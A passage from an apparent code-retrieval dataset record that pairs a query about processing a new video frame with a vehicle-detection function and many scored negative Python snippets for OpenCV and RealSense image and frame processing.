filtered_circles, -1, (0, 255, 0), 2)\n cv2.imshow(\"found_buoys\", cm_copy_image)\n cv2.waitKey(0)\n\n return circle_positions", "def on_image(image):\n objects = [obj for obj in coco.classify(image) if obj.confidence > config.OBJECT_CONFIDENCE_THRESHOLD]\n queue.put((image, objects))", "def run_visualization(image):\n original_im = Image.fromarray(image)\n seg_map = model.run(original_im)\n seg_image = label_to_color_image(seg_map).astype(np.uint8)\n\n return seg_image", "def check_image(self, image, temps):\n self.logger.debug('Check image \"%s\"', image)\n _, edges = cv2.threshold(cv2.imread(image, 0), 127, 255, cv2.THRESH_BINARY)\n\n result = []\n for filename in temps:\n template = cv2.imread(filename, 0)\n width, hight = template.shape[::-1]\n\n res = cv2.matchTemplate(edges, template, cv2.TM_CCORR_NORMED)\n if self.multi:\n for point in zip(*np.where(res >= self.threshold)[::-1]):\n result.append((point, (point[0] + width, point[1] + hight)))\n else:\n _, max_val, _, max_loc = cv2.minMaxLoc(res)\n if max_val > self.threshold:\n result.append((max_loc, (max_loc[0] + width, max_loc[1] + hight)))\n return result" ]
[ "0.7544776", "0.751789", "0.69776064", "0.68778455", "0.6797643", "0.6754273", "0.6741402", "0.6733516", "0.6707194", "0.669984", "0.66010076", "0.65580624", "0.65305924", "0.6255979", "0.6248127", "0.62139523", "0.6213312", "0.6186227", "0.6084384", "0.6077522", "0.6051025", "0.60180014", "0.6016718", "0.5978734", "0.59658897", "0.5949986", "0.58877367", "0.5875262", "0.58746266", "0.58679885", "0.583015", "0.58280647", "0.5818854", "0.581733", "0.5815878", "0.5794954", "0.57684135", "0.5733923", "0.5727015", "0.5721082", "0.5720878", "0.5713227", "0.5699824", "0.56929517", "0.56903875", "0.56770223", "0.5664665", "0.56470877", "0.5642082", "0.56085926", "0.5605678", "0.560171", "0.5601574", "0.55883205", "0.5575753", "0.55701905", "0.55618453", "0.555158", "0.5548128", "0.55449694", "0.55321765", "0.55206245", "0.5516395", "0.5514854", "0.5505338", "0.5502421", "0.5502127", "0.5495911", "0.5495591", "0.5492643", "0.5490653", "0.5482417", "0.547939", "0.54767305", "0.5474084", "0.5465627", "0.5451739", "0.5446285", "0.5446187", "0.5440735", "0.54403836", "0.54337716", "0.5432064", "0.54245454", "0.54218787", "0.5421751", "0.54176354", "0.54152966", "0.5415175", "0.54134166", "0.54077184", "0.54031795", "0.54025275", "0.5402527", "0.5396272", "0.5390581", "0.5381702", "0.53789", "0.537767", "0.5374618" ]
0.6223624
15
pipeline for new frame image
def process_image(self, img): show = False # draw_image = np.copy(img) # search all scale windows and return cars' windows hots = search_scales(img,self.svc, self.X_scaler, self.orient, self.pix_per_cell, self.cell_per_block, self.spatial_size, self.hist_bins) # update the self boxes self.update(hots) # detect cars using threshold window_image = self.detect(img, 2) if show: plt.imshow(window_image) plt.show() return window_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run_frame(self, image):\n self.frame_idx += 1\n # run main pipeline\n t0 = datetime.now()\n disp = self.main_pipeline(image)\n t1 = datetime.now()\n logging.info('main pipeline: {}'.format(get_tdiff(t0, t1)))\n \n # prepare image sequence of 3 for trajectory pipeline\n t0 = datetime.now()\n self.image_seq.append(image)\n if len(self.image_seq) > 3:\n del self.image_seq[0]\n t1 = datetime.now()\n logging.info('image stack: {}'.format(get_tdiff(t0, t1)))\n\n # run trajectory pipeline\n t0 = datetime.now()\n if len(self.image_seq) >= 3:\n self.egomo_trmat = self.traj_pipeline(prev_trmat=self.egomo_trmat)\n t1 = datetime.now()\n logging.info('traj pipeline: {}'.format(get_tdiff(t0, t1)))\n return self.frame_idx, disp, self.egomo_trmat, self.t_list", "def process(self, image):", "def transform(self, previousimage):", "def run_frame(self, ti, img):\n pass", "def gen():\n global dataFrame\n while True:\n frame = vs.read()\n # frame = imutils.resize(frame, width=400)\n \n (flag, encodedImage) = cv2.imencode(\".jpg\", frame.copy())\n if not flag: continue\n # print (encodedImage)\n dataFrame = yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + bytearray(encodedImage) + b'\\r\\n')", "def create_new_frame(image_file, green_file, process_file):\n\n # this print() statement is there to help see which frame is being processed\n print(f'{process_file[-7:-4]}', end=',', flush=True)\n\n image_img = Image.open(image_file)\n green_img = Image.open(green_file)\n\n # Make Numpy array\n np_img = np.array(green_img)\n\n # Mask pixels \n mask = (np_img[:, :, BLUE] < 120) & (np_img[:, :, GREEN] > 120) & (np_img[:, :, RED] < 120)\n\n # Create mask image\n mask_img = Image.fromarray((mask*255).astype(np.uint8))\n\n image_new = Image.composite(image_img, green_img, mask_img)\n image_new.save(process_file)", "def frame_pre_process(self, frame):\n assert len(frame.shape) == 3, \\\n \"Expected input frame in (H, W, C) format proposed\"\n assert frame.shape[2] in [3, 4], \\\n \"Expected BGR or BGRA input process\"\n # setup the frame in the original format\n \n #orig_image = frame.copy()\n original_image = frame.copy()\n \n # creating the frame transpose conversion\n frame = frame.transpose((2, 0, 1)) # Converting from HWC to CHW\n \n # creating the frame dimensions\n frame = np.expand_dims(frame, axis=0)\n \n # return the frames outcome\n return (frame)", "def create_frame_blob(self):\n # self.image_blob = cv2.dnn.blobFromImage(\n # cv2.resize(self.frame, (300, 300)), 1.0, (300, 300),\n # (104.0, 177.0, 123.0), swapRB=False, crop=False)\n self.image_blob = cv2.dnn.blobFromImage(cv2.resize(self.frame, (300, 300)),\n 0.007843, (300, 300), 127.5)", "def process_pipeline(frame, keep_state=True):\n\n global line_lt, line_rt, processed_frames\n\n # undistort the image using coefficients found in calibration\n undistorted_img = undistort(frame, mtx, dist)\n\n # binarize the frame and highlight lane lines\n binarized_img = binarize(undistorted_img)\n\n # perspective transform to obtain bird's eye view\n birdeye_img, matrix, inversed_matrix = birdeye(binarized_img, visualise=False)\n\n # 2 order polynomial curve fit onto lane lines found\n if processed_frames > 0 and keep_state and line_lt.detected and line_rt.detected:\n find_lane_by_previous_fits(birdeye_img, line_lt, line_rt, visualise=False)\n else:\n find_lane_by_sliding_windows(birdeye_img, line_lt, line_rt, n_windows=9, visualise=False)\n\n # compute offset in meter from center of the lane\n offset_meter = offset_from_lane_center(line_lt, line_rt, frame_width=frame.shape[1])\n\n # draw the surface enclosed by lane lines back onto the original frame\n blend_on_road = draw_back_onto_the_road(undistorted_img, inversed_matrix, line_lt, line_rt, keep_state)\n mean_curvature_meter = np.mean([line_lt.curvature_meter, line_rt.curvature_meter])\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(blend_on_road, 'Curvature radius: {:.02f}m'.format(mean_curvature_meter), (60, 60), font, 1,\n (255, 255, 255), 2)\n cv2.putText(blend_on_road, 'Offset from center: {:.02f}m'.format(offset_meter), (60, 90), font, 1,\n (255, 255, 255), 2)\n\n processed_frames += 1\n\n return blend_on_road", "def run_record(self, state, pipeline, record_path):\n e1 = cv2.getTickCount()\n while state.record_btn:\n # Wait for a coherent pair of frames: depth and color\n frames = pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue\n \n # filter\n depth_frame = self.th_filter.process(depth_frame)\n depth_frame = self.sp_filter.process(depth_frame)\n depth_frame = self.tmp_filter.process(depth_frame)\n\n depth_colormap = self.colorizer.colorize(depth_frame)\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_colormap.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n lane_masked = self.lane_detector.detect(color_image)\n # Show images\n stacked_imgs = (color_image, depth_image, lane_masked)\n images = np.hstack(stacked_imgs)\n cv2.resizeWindow(state.WIN_NAME, \n self.width*len(stacked_imgs), \n self.height)\n cv2.imshow(state.WIN_NAME, images)\n cv2.setMouseCallback(state.WIN_NAME, state.mouse_controll)\n key = cv2.waitKey(1)\n if key == 27:\n state.app_btn = False\n state.record_btn = False\n break\n # Calculate Runtime Tick to quit\n e2 = cv2.getTickCount()\n tick = int((e2 - e1) / cv2.getTickFrequency())\n # Save images per tick\n if self.saveimg:\n color_file = record_path / f\"color-{tick}.npy\"\n depth_file = record_path / f\"depth-{tick}.npy\"\n ps_file = record_path / f\"ps-{tick}.ply\"\n if not ps_file.exists():\n np.save(color_file, color_image)\n np.save(depth_file, depth_image)\n \n # Create point cloud\n if self.savepc and (not ps_file.exists()):\n points = self.pc.calculate(depth_frame)\n self.pc.map_to(depth_frame)\n points.export_to_ply(str(ps_file), color_frame)\n\n if tick > self.record_time:\n print(\"Finish Record\")\n state.app_btn = False\n state.record_btn = False\n cv2.destroyAllWindows()\n break\n\n if not state.app_btn:\n break", "def SIMPLEST_PIPELINE():\n return lambda image_path, label: (\n tf.image.decode_jpeg(tf.io.read_file(image_path), channels=3),\n label\n )", "def __call__(self, frame_num):\n # propagate and set the density\n self.img.set_array(\n np.abs(self.quant_sys.propagate(10)) ** 2\n )\n return self.img,", "def gen_frame():\n while True:\n frame = camera_stream()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/png\\r\\n\\r\\n' + frame + b'\\r\\n') # concate frame one by one and show result", "def process(image):\n pass", "def frameProcessing():\n\tglobal referenceFrame\n\tglobal dilatedFrame\n\t#receive the image from the request.\n\tfile = request.json\n\tframe = np.array(file[\"Frame\"], dtype = \"uint8\")\n\t\n\t#gray-scale conversion and Gaussian blur filter applying\n\tgrayFrame = greyScaleConversion(frame)\n\tblurredFrame = gaussianBlurring(grayFrame)\n\n\t#Check if a frame has been previously processed and set it as the previous frame.\n\tif type(referenceFrame) ==int():\n\t\treferenceFrame = blurredFrame\n\t\n\t#Background subtraction and image binarization\n\tframeDelta = getImageDiff(referenceFrame, blurredFrame)\n\treferenceFrame = blurredFrame\n\t#cv2.imwrite(\"previousImage.jpg\", blurredFrame)\n\tframeThresh = thresholdImage(frameDelta, binarizationThreshold)\n\n\t#Dilate image and find all the contours\n\tdilatedFrame = dilateImage(frameThresh)\n\t#cv2.imwrite(\"dilatedFrame.jpg\", dilatedFrame)\n\tcnts = getContours(dilatedFrame.copy())\n\t\n\theight = np.size(frame,0)\n\tcoordYEntranceLine = int((height / 2)-offsetEntranceLine)\n\tcoordYExitLine = int((height / 2)+offsetExitLine)\n\theaders = {\"enctype\" : \"multipart/form-data\"}\n\tr = requests.post(\"http://\" + getNextServer() + \"/objectClassifier\", headers = headers, json = {\"Frame\":frame.tolist()} )\n\t\"\"\"\t\n\tfor c in cnts:\n\t\tprint(\"x\")\n\t\tif cv2.contourArea(c) < minContourArea:\n\t\t\tprint(\"Small Area\", cv2.contourArea(c))\n\t\t\tcontinue\n\t\t(x, y, w, h) = getContourBound(c)\n\t\t#grab an area 2 times larger than the contour.\n\t\tcntImage = frame[y:y+int(1.5*w), x:x+int(1.5*h)]\n\t\tobjectCentroid = getContourCentroid(x, y, w, h)\n\t\tcoordYCentroid = (y+y+h)/2\n\t\t\n\t\t\n\t\t#if (checkEntranceLineCrossing(coordYCentroid,coordYEntranceLine,coordYExitLine)):\t\t\t\t\n\t\theaders = {\"enctype\" : \"multipart/form-data\"}\n\t\t#i = random.randint(1,1000)\n\t\t#cv2.imwrite(\"ContourImages/contour\"+str(i)+\".jpg\", cntImage)\n\t\t#files = {\"image\":open(\"ContourImages/contour\"+str(i)+\".jpg\", \"rb\")}\n\t\tdata = {\"contour\" : cntImage.tolist()}\n\t\tr = requests.post(\"http://\" + getNextServer() + \"/objectClassifier\", headers = headers, json = data )\n\n\t\n\t\"\"\"\n\treturn Response(status=200)", "def write_frame(self, img):\n if img.shape[0] % 2 != 0:\n print(\"Warning: height is not divisible by 2! Dropping last row\")\n img = img[:-1]\n if img.shape[1] % 2 != 0:\n print(\"Warning: width is not divisible by 2! Dropping last column\")\n img = img[:, :-1]\n if self.post_processor:\n img = self.post_processor.process(img)\n if self.width is None:\n self.width = img.shape[0]\n self.height = img.shape[1]\n assert os.path.exists(self.directory)\n fn = FRAME_FN_TEMPLATE % self.frame_counter\n self.frame_fns.append(fn)\n imwrite(img, os.path.join(self.frame_directory, fn))\n self.frame_counter += 1\n if self.frame_counter % self.next_video_checkpoint == 0:\n if self.automatic_build:\n self.make_video()\n self.next_video_checkpoint *= 2", "def _create_vtk_pipeline(self):\n if self._viewer is None and not self._view_frame is None:\n \n if True:\n self._viewer = vtk.vtkImageViewer2()\n self._viewer.SetupInteractor(self._view_frame._rwi)\n self._viewer.GetRenderer().SetBackground(0.3,0.3,0.3)\n \n else:\n ren = vtk.vtkRenderer()\n self._view_frame._rwi.GetRenderWindow().AddRenderer(ren)", "def process_frame(self, frame):\n\t\treturn frame", "def gen(camera):\n while True:\n # frame_findline = camera.get_frame()\n frame_findline, center_Pos1, center_Pos2 = camera.get_frame()\n frame_findline = cv2.line(frame_findline, (center_Pos1, 440), (center_Pos2, 380), (255,100,0), 5)\n\n frame = cv2.imencode('.jpg', frame_findline)[1].tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def _prepare_frame(self, frame):\n\n initial_h, initial_w = frame.shape[:2]\n scale_h, scale_w = initial_h / float(self.input_height), initial_w / float(self.input_width)\n\n in_frame = cv2.resize(frame, (self.input_width, self.input_height))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape(self.input_size)\n\n return in_frame, scale_h, scale_w", "def process_image(self):\n pass", "def image_processing(eye_frame, threshold):\n kernel = np.ones((3, 3), np.uint8)\n new_frame = cv2.bilateralFilter(eye_frame, 10, 15, 15)\n new_frame = cv2.erode(new_frame, kernel, iterations=3)\n new_frame = cv2.threshold(new_frame, threshold, 255, cv2.THRESH_BINARY)[1]\n\n return new_frame", "def _create_pipeline(self) -> TfmIterator:\n # 1. Initialise TubRecord -> x, y transformations\n def get_x(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting x from record for training\"\"\"\n out_dict = self.model.x_transform(record, self.image_processor)\n # apply the normalisation here on the fly to go from uint8 -> float\n out_dict['img_in'] = normalize_image(out_dict['img_in'])\n return out_dict\n\n def get_y(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting y from record for training \"\"\"\n y = self.model.y_transform(record)\n return y\n\n # 2. Build pipeline using the transformations\n pipeline = self.sequence.build_pipeline(x_transform=get_x,\n y_transform=get_y)\n return pipeline", "def captureNextFrame(self):\r\n mainls = []\r\n\r\n\r\n ret, readFrame = self.capture.read()\r\n\r\n if (ret == True):\r\n self.currentFrame = cv2.cvtColor(readFrame, cv2.COLOR_BGR2RGB)\r\n self.faceDetection(self.currentFrame)\r\n self.currentFrame = self.bbFrame", "def pipeline(image):\n # undistort image\n undistorted_image = undistort_image(image)\n superimposed_image = find_lanes(undistorted_image)\n labels = find_vehicles(undistorted_image)\n\n draw_img = draw_labeled_bboxes(superimposed_image, labels)\n\n \n return draw_img", "def extract_frames(pipe, \r\n cfg, \r\n save_path,\r\n post_processing=False,\r\n save_colorize=True,\r\n save_pc=False,\r\n visualize=True):\r\n # Configurations\r\n if save_colorize:\r\n colorizer = rs.colorizer()\r\n if save_pc:\r\n pc = rs.pointcloud()\r\n points = rs.points()\r\n # Save path\r\n if not os.path.exists(save_path):\r\n os.makedirs(save_path)\r\n\r\n # Start the pipe\r\n i = 0\r\n profile = pipe.start(cfg)\r\n device = profile.get_device()\r\n playback = device.as_playback()\r\n playback.set_real_time(False) # Make sure this is False or frames get dropped\r\n while True:\r\n try:\r\n # Wait for a conherent pairs of frames: (rgb, depth)\r\n pairs = pipe.wait_for_frames()\r\n\r\n # Align depth image to rgb image first\r\n align = rs.align(rs.stream.color)\r\n pairs = align.process(pairs)\r\n\r\n color_frame = pairs.get_color_frame()\r\n depth_frame = pairs.get_depth_frame()\r\n if not depth_frame or not color_frame:\r\n continue\r\n\r\n # Post-processing\r\n if post_processing:\r\n depth_frame = post_processing(depth_frame)\r\n\r\n # Get rgb-d images\r\n color_img = np.asanyarray(color_frame.get_data())\r\n color_img = cv2.cvtColor(color_img, cv2.COLOR_RGB2BGR)\r\n depth_img = np.asanyarray(depth_frame.get_data())\r\n print('Frame {}, Depth Image {}, Color Image {}'.format(i+1, depth_img.shape, color_img.shape))\r\n \r\n # Save as loseless formats\r\n cv2.imwrite(os.path.join(save_path, '{}_rgb.png'.format(i)), color_img, [cv2.IMWRITE_PNG_COMPRESSION, 0])\r\n np.save(os.path.join(save_path, '{}_depth.npy'.format(i)), depth_img)\r\n \r\n if save_colorize:\r\n # Save colorized depth map\r\n depth_img_colorized = np.asanyarray(colorizer.colorize(depth_frame).get_data())\r\n cv2.imwrite(os.path.join(save_path, '{}_depth_colorized.jpg'.format(i)), depth_img_colorized) # No need for lossless here\r\n \r\n if save_pc:\r\n # NOTE: Point cloud calculation takes longer time.\r\n pc.map_to(color_frame)\r\n points = pc.calculate(depth_frame)\r\n points.export_to_ply(os.path.join(save_path, '{}_pc.ply'.format(i)), color_frame)\r\n \r\n i += 1\r\n\r\n if visualize:\r\n # Stack both images horizontally\r\n images = np.vstack((color_img, depth_img_colorized))\r\n\r\n # Show images\r\n cv2.namedWindow('RealSense', cv2.WINDOW_NORMAL)\r\n cv2.imshow('RealSense', images)\r\n cv2.waitKey(1)\r\n \r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n # Clean pipeline\r\n pipe.stop()\r\n print('{} frames saved in total.'.format(i))\r\n\r\n return", "def get_image(self):\n self.flush_buffer()\n _, frame = self.cam.read()\n shift_frame = self.perspective_shift(frame)\n #shift_frame = None\n return frame, shift_frame", "def update_frame(self, frame):\n\n t = datetime.now()\n delta_t = t - self.dpar.frame_timestamp[0]\n fps = self.dpar.update_fps(1./delta_t.total_seconds())\n\n self.dpar.frame_timestamp[0] = t\n\n if self.config.black_correct:\n cframe = self.ffc.black_correct(frame)\n else:\n cframe = frame\n\n self.dpar.latest_frame = np.copy(cframe)\n \n if self.dpar.cap_live_swap:\n pix, gray = self._get_pixmap(cframe[::4,::4], self.dpar.iwindow[0])\n self.cap_screen.cap_title = self._live_title(fps)\n self.cap_screen.setPixmap(pix)\n else: \n pix, gray = self._get_pixmap(cframe, self.dpar.iwindow[0])\n self.live_screen.live_title = self._live_title(fps)\n self.live_screen.setPixmap(pix)\n\n self.draw_histogram()\n\n\n if self.recording_sequence:\n\n # MRP ToDo update these tags properly.\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n ifi_ms = 1000. / self.camera.actual_frame_rate\n ts_ms = np.int(np.round(ifi_ms * self.seq_frame_num))\n\n self.ifd.update_tags((self.seq_frame_num, 0), et, 0, ts_ms, 99)\n\n cap_image = np.copy(self.dpar.latest_frame).astype(np.uint16)\n #cv2.imwrite(cfn, (cap_image << (16 - self.camera.pixel_bits)).astype(np.uint16))\n\n \"\"\"\n Perform the TIFF windowing and then rebinning (compress) according to config file options\n \"\"\"\n x0 = max(0, (cap_image.shape[1] - config.tiff_seq_x_window) // 2)\n x1 = cap_image.shape[1] - x0\n y0 = max(0, (cap_image.shape[0] - config.tiff_seq_y_window) // 2)\n y1 = cap_image.shape[0] - y0\n cap_image = cap_image[y0:y1, x0:x1]\n\n shift_bits = 16 - self.camera.pixel_bits\n if config.tiff_seq_rebin > 1: # not tested for r ne 2\n r = config.tiff_seq_rebin\n cap_image = cap_image.reshape((cap_image.shape[0] // r, r, cap_image.shape[1] // r, -1)).sum(axis=3).sum(axis=1)\n extra_bits = 2 * (r.bit_length() -1)\n shift_bits = max(0, shift_bits - extra_bits)\n\n\n #im = PIL.Image.fromarray(gray)\n im = PIL.Image.fromarray((cap_image << shift_bits).astype(np.uint16))\n\n im.save(self.tiff_out, tiffinfo=self.ifd, compression=TIFF_COMPRESSION)\n self.tiff_out.newFrame()\n self.seq_frame_num += 1\n self.seq_frame_label.setText(str(self.seq_frame_num))\n\n if self.recording_video:\n # cframe is int16\n #f8 = ((cframe >> (self.camera.pixel_bits - 8)) & 0xff).astype(np.uint8)\n #Style 1:\n #fc = np.stack((f8, f8, f8), axis=-1)\n #self.rv_vout.write(fc)\n #Style 2&3:\n self.rv_vout.write(gray)\n self.recorded_video_frame_number += 1\n #Style 4: (16-bit)\n #self.rv_vout.write(cframe)\n\n #if self.recorded_video_frame_number == 20:\n # self.record_video() # turn off", "def __init__(self):\n self.active = True # Camera activation control\n self.stream = cv2.VideoCapture(0) # Open video stream\n while not self.stream.isOpened():\n pass\n _,self.image = self.stream.read()# Save the first frame\n cv2.waitKey(10)\n self.frame = self.image[196:304,:546,:]# Cropped frame\n self.diff_frame = self.frame\n# self.reference_frame = copy.deepcopy(self.frame)\n# self.abs_diff_frame = copy.deepcopy(self.frame)\n self.reference_frame = self.frame\n self.abs_diff_frame = self.frame\n self.frame_count = 1 # Used for framerate estimation\n self.frame_rate = 0\n self.tic = time()", "def processframe(pilimage):\n # TODO: Idea on of overfilling\n # [[0,0,0],\n # [1,1,1],\n # [0,0,0]]\n # Keep this as template. aka pattern. use scipy measure and that s pattern to match all connecting\n # this gets all the fills. the rest is thrown into the pile of sets.\n # we assume index 0 as discarded (Can't really do much with black images.)\n numpyarrayfrompil = numpy.array(pilimage)\n # First we pass to regionprops\n props = createfillers(numpyarrayfrompil)\n # pass all the data we need now to the mapprops2color\n # returns a string which can be cerealised.\n return mapprops2color(props, numpyarrayfrompil, pilimage)", "def make(self) -> None:\n\n # arbitrarily selecting the first image from the list, index 0\n with Image.open(self.image_list[0]) as first_frame_image_in_list:\n\n # Find the width and height of the first image of the list.\n # Assuming all the images have same size.\n frame_image_width, frame_image_height = first_frame_image_in_list.size\n\n # scale is the ratio of collage_image_width and product of\n # images_per_row_in_collage with frame_image_width.\n\n # The scale will always lie between 0 and 1, which implies that\n # the images are always going to get downsized.\n scale = (self.collage_image_width) / (\n self.images_per_row_in_collage * frame_image_width\n )\n\n # Calculating the scaled height and width for the frame image.\n scaled_frame_image_width = ceil(frame_image_width * scale)\n scaled_frame_image_height = ceil(frame_image_height * scale)\n\n # Divide the number of images by images_per_row_in_collage. The later\n # was calculated by taking the square root of total number of images.\n number_of_rows = ceil(self.number_of_images / self.images_per_row_in_collage)\n\n # Multiplying the height of one downsized image with number of rows.\n # Height of 1 downsized image is product of scale and frame_image_height\n # Total height is number of rows times the height of one downsized image.\n self.collage_image_height = ceil(scale * frame_image_height * number_of_rows)\n\n # Create an image of passed collage_image_width and calculated collage_image_height.\n # The downsized images will be pasted on this new base image.\n # The image is 0,0,0 RGB(black).\n collage_image = Image.new(\n \"RGB\", (self.collage_image_width, self.collage_image_height)\n )\n\n # keep track of the x and y coordinates of the resized frame images\n i, j = (0, 0)\n\n # iterate the frames and paste them on their position on the collage_image\n for count, frame_path in enumerate(self.image_list):\n\n # Set the x coordinate to zero if we are on the first column\n # If self.images_per_row_in_collage is 4\n # then 0,4,8 and so on should have their x coordinate as 0\n if (count % self.images_per_row_in_collage) == 0:\n i = 0\n\n # open the frame image, must open it to resize it using the thumbnail method\n frame = Image.open(frame_path)\n\n # scale the opened frame images\n frame.thumbnail(\n (scaled_frame_image_width, scaled_frame_image_height), Image.ANTIALIAS\n )\n\n # set the value of x to that of i's value.\n # i is set to 0 if we are on the first column.\n x = i\n\n # It ensures that y coordinate stays the same for any given row.\n # The floor of a real number is the largest integer that is less\n # than or equal to the number. floor division is used because of\n # the zero based indexing, the floor of the division stays same\n # for an entier row as the decimal values are negled by the floor.\n # for the first row the result of floor division is always zero and\n # the product of 0 with scaled_frame_image_height is also zero, they\n # y coordinate for the first row is 0.\n # For the second row the result of floor division is one and the prodcut\n # with scaled_frame_image_height ensures that the y coordinate is\n # scaled_frame_image_height below the first row.\n y = (j // self.images_per_row_in_collage) * scaled_frame_image_height\n\n # paste the frame image on the newly created base image(base image is black)\n collage_image.paste(frame, (x, y))\n frame.close()\n\n # increase the x coordinate by scaled_frame_image_width\n # to get the x coordinate of the next frame. unless the next image\n # will be on the very first column this will be the x coordinate.\n i = i + scaled_frame_image_width\n\n # increase the value of j by 1, this is to calculate the y coordinate of\n # next image. The increased number will be floor divided by images_per_row_in_collage\n # therefore the y coordinate stays the same for any given row.\n j += 1\n\n # save the base image with all the scaled frame images embeded on it.\n collage_image.save(self.output_path)\n collage_image.close()", "def __image_pipeline(self, img):\n \n ##### Lane finding pipeline #######\n resized = self.__resize_image(img)\n undistorted = self.__correct_distortion(resized)\n warped = self.__warp_image_to_biv(undistorted)\n thresholded = self.__threshold_image(warped)\n lines = self.__get_lane_lines(thresholded)\n lane_img = self.__draw_lane_lines(undistorted, thresholded, include_stats=True)\n\n\n ##### Vehicle Tracking pipeline #####\n\n hot_windows = self.windFinder.get_hot_windows(img)\n car_boxes, wrap_img = self.vTracker.image_pipeline(img, hot_windows,\n return_img=False) \n # img = cv2.addWeighted(img, 1, wrap_img, 0.5, 0)\n result = self.__draw_boxes(lane_img, car_boxes)\n\n return result", "def processFrame(frame, shape=(84, 84)):\n frame = frame.astype(np.uint8) # cv2 requires np.uint8\n # Apply a rgb filter to convert RGB to Gray Scale\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n # crop image OpenCv2 function to format img[y:y + h, x:x + w]\n frame = frame[34:34+160, :160] # crop image\n frame = cv2.resize(frame, shape, interpolation=cv2.INTER_NEAREST)\n frame = frame.reshape((*shape, 1))\n #cv2.imshow('Cropped Image', frame)\n\n return frame", "def PrePush(self, image):\n pass", "def display_preprocessed(env,frame):\n env.reset()\n\n #Plot the figure\n plt.figure()\n\n #Show the pre processed frame\n plt.imshow(preprocess_frame(env.reset(), (0, 0, 0, 0), 84), cmap=\"gray\")\n\n #Add title\n plt.title('Pre Processed image')\n\n #Show the plot\n plt.show()", "def add_frame(self, frame, player_box):\n # ROI is a small box around the player\n box_center = center_of_box(player_box)\n patch = frame[int(box_center[1] - self.box_margin): int(box_center[1] + self.box_margin),\n int(box_center[0] - self.box_margin): int(box_center[0] + self.box_margin)].copy()\n patch = imutils.resize(patch, 299)\n frame_t = patch.transpose((2, 0, 1)) / 255\n frame_tensor = torch.from_numpy(frame_t).type(self.dtype)\n frame_tensor = self.normalize(frame_tensor).unsqueeze(0)\n with torch.no_grad():\n # forward pass\n features = self.feature_extractor(frame_tensor)\n features = features.unsqueeze(1)\n # Concatenate the features to previous features\n if self.frames_features_seq is None:\n self.frames_features_seq = features\n else:\n self.frames_features_seq = torch.cat([self.frames_features_seq, features], dim=1)", "def grab_next_frame(self):\n if Rescue_PI.input_video_file_path is None:\n self.orig_frame = self.vs.read()\n self.frame = self.orig_frame.copy()\n else:\n _, self.frame = self.vs.read()\n # self.frame = cv2.rotate(self.frame, cv2.ROTATE_180)\n if self.frame is None:\n pass\n else:\n self.frame = imutils.resize(self.frame, width=frame_width_in_pixels)", "def gen(camera):\n \n while True:\n \n \n \n frame = camera.get_frame()\n \n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def apply(self, fn):\n return Frame(fn(self.rgb))", "def process_frame(self, img):\n found = []\n for scale in self.settings['scales']:\n found.extend(find_cars(img, scale[0], scale[1], scale[2], scale[3], scale[4], self.clf, self.scaler,\n self.settings['color_space'], self.settings['orient'], self.settings['pix_per_cell'],\n self.settings['cell_per_block'], self.settings['spatial_size'],\n self.settings['hist_bins'], self.log, self.settings['min_conf']))\n\n self.prev_frames.append(found)\n if len(self.prev_frames) > self.settings['n_frames']:\n self.prev_frames.pop(0)\n heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n for frame in self.prev_frames:\n f_heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n add_heat(f_heatmap, frame)\n heatmap = heatmap * f_heatmap\n\n acc_heatmap = np.copy(heatmap)\n\n bboxes = find_bboxes_from_heatmap(apply_threshold(heatmap,\n self.settings['heat_threshold'] ** self.settings['n_frames']))\n\n if self.settings['DEBUG']:\n single_heatmap = add_heat(np.zeros_like(img[:, :, 0]).astype(np.float), found)\n single_heatmap = np.clip(single_heatmap, 0, 255)\n single_heatmap = np.dstack((single_heatmap, single_heatmap, single_heatmap))\n acc_heatmap = np.sqrt(acc_heatmap)\n acc_heatmap = np.clip(acc_heatmap, 0, 255)\n acc_heatmap = np.dstack((acc_heatmap, acc_heatmap, acc_heatmap))\n labels = np.clip(heatmap, 0, 1)*255\n labels = np.dstack((labels, labels, labels))\n final = draw_boxes(img, bboxes)\n frame = np.concatenate((np.concatenate((single_heatmap, acc_heatmap), axis=1),\n np.concatenate((labels, final), axis=1)), axis=0)\n return cv2.resize(frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)))\n else:\n return draw_boxes(img, bboxes)", "def update(self):\r\n\r\n # Update the vision frames in the system\r\n self._system.update()\r\n\r\n # Create blank PIL images to hold the video streams\r\n layered = PIL.Image.new('RGBA', (400, 400))\r\n stacked = PIL.Image.new('RGBA', (200, 800))\r\n control = PIL.Image.new('RGBA', (600, 800))\r\n\r\n focalpoint = self._system[self._appString[\"device\"].get()].focalpoint()\r\n # print(focalpoint)\r\n\r\n # Get each vision key and vision for the selected device\r\n visionList = [(visionKey, vision) for visionKey, vision in self._system[self._appString[\"device\"].get()]]\r\n\r\n # Loop through each vision in the vision list\r\n for i, (visionKey, vision) in enumerate(visionList):\r\n\r\n # Grab the frames from the vision when it is \"curr\"\r\n frameList = [frame for frameKey, frame in vision if frameKey==self._appString[\"frame\"].get()]\r\n\r\n # Loop through each frame in the frame list\r\n for frame in frameList:\r\n\r\n # Get the properties and turn the image into RGBA\r\n ratio, size = vision.properties()\r\n rgbFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n\r\n # print(rgbFrame.shape)\r\n width, height, channels = rgbFrame.shape\r\n\r\n # Paste the images together in layered\r\n\r\n imgFrame = 